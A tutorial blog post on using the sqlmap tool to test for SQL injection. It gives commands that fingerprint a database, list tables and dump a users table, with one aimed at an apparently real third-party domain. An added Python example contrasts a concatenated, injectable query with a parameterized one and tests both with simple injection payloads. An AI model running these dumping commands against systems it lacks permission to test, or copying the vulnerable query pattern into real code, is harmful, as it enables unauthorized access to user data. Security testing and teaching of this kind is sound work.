How to Use SQLmap to Test for SQL Injection Vulnerability | Full Tutorial

Motasem Hamdan
2 min read · Sep 15, 2024

In this post, we discuss and explain SQLmap, one of the most popular tools for database security testing. SQLmap is used in security assessments to check whether a database is vulnerable to SQL injection attacks.

Please watch the video at the bottom for a full, detailed explanation of the walkthrough.

What is SQLmap

An open-source penetration testing tool called sqlmap makes it easier to find and take advantage of SQL injection vulnerabilities to take control of database servers. It has a strong detection engine, a ton of specialized features for the ultimate penetration tester, and a wide range of switches, such as those for database fingerprinting, retrieving data from databases, accessing the underlying file system, and using out-of-band connections to run commands on the operating system.

SQLmap Use Cases in Database Security

  • SQL Injection Vulnerability
  • General Database Security Settings.

SQLmap Usage

You can install sqlmap by executing the command below:

attacker@attacker:~$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the user’s manual.

Example use cases of SQLmap to test the security of databases

Grabbing the Database software

root@kali: sqlmap -u example.com/product/14* --banner

We append an asterisk (*) to the URL because the vulnerable parameter is not clear to us.

or

root@kali: sqlmap -r req.txt --current-db

Listing Tables

root@kali: sqlmap -u catalog.sph-assets.com/product/14* --tables

or

root@kali: sqlmap -r request.txt -D social --tables

Dump entries from a specific table

root@kali: sqlmap -u example.com/product/14* -T users_field_data --dump
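
What a finding on the /product/14* injection point means in the application code, and what the fix looks like, shown as an added example that is not from the original post or from sqlmap itself. The table, sample rows and function names are assumptions constructed for illustration, and the boolean-pair check is a simplified version of a boolean-based injection test that you can run against your own handlers.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(13, "lamp"), (14, "desk"), (15, "chair")])
    return conn

def product_vulnerable(conn, segment):
    # Weak: the URL path segment (the "14" in /product/14) is pasted into
    # the SQL text, so input can change the structure of the query.
    sql = "SELECT id, name FROM products WHERE id = " + segment
    return conn.execute(sql).fetchall()

def product_hardened(conn, segment):
    # Hardened: reject anything that is not a plain ASCII integer, then bind
    # the value as a parameter so it is only ever treated as data.
    if not (segment.isascii() and segment.isdigit()):
        return []
    return conn.execute("SELECT id, name FROM products WHERE id = ?",
                        (int(segment),)).fetchall()

def is_injectable(handler, conn, value="14"):
    # Boolean-pair check: an always-true suffix must leave the result
    # unchanged and an always-false suffix must change it. Only a handler
    # that interprets its input as SQL shows that pattern.
    base = handler(conn, value)
    true_case = handler(conn, value + " AND 1=1")
    false_case = handler(conn, value + " AND 1=2")
    return true_case == base and false_case != base

if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler injectable:", is_injectable(product_vulnerable, db))
    print("hardened handler injectable:  ", is_injectable(product_hardened, db))
```
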

Full SQLmap Tutorial

Written by Motasem Hamdan

Motasem Hamdan is a content creator and swimmer who creates cyber security training videos and articles. https://www.youtube.com/@MotasemHamdan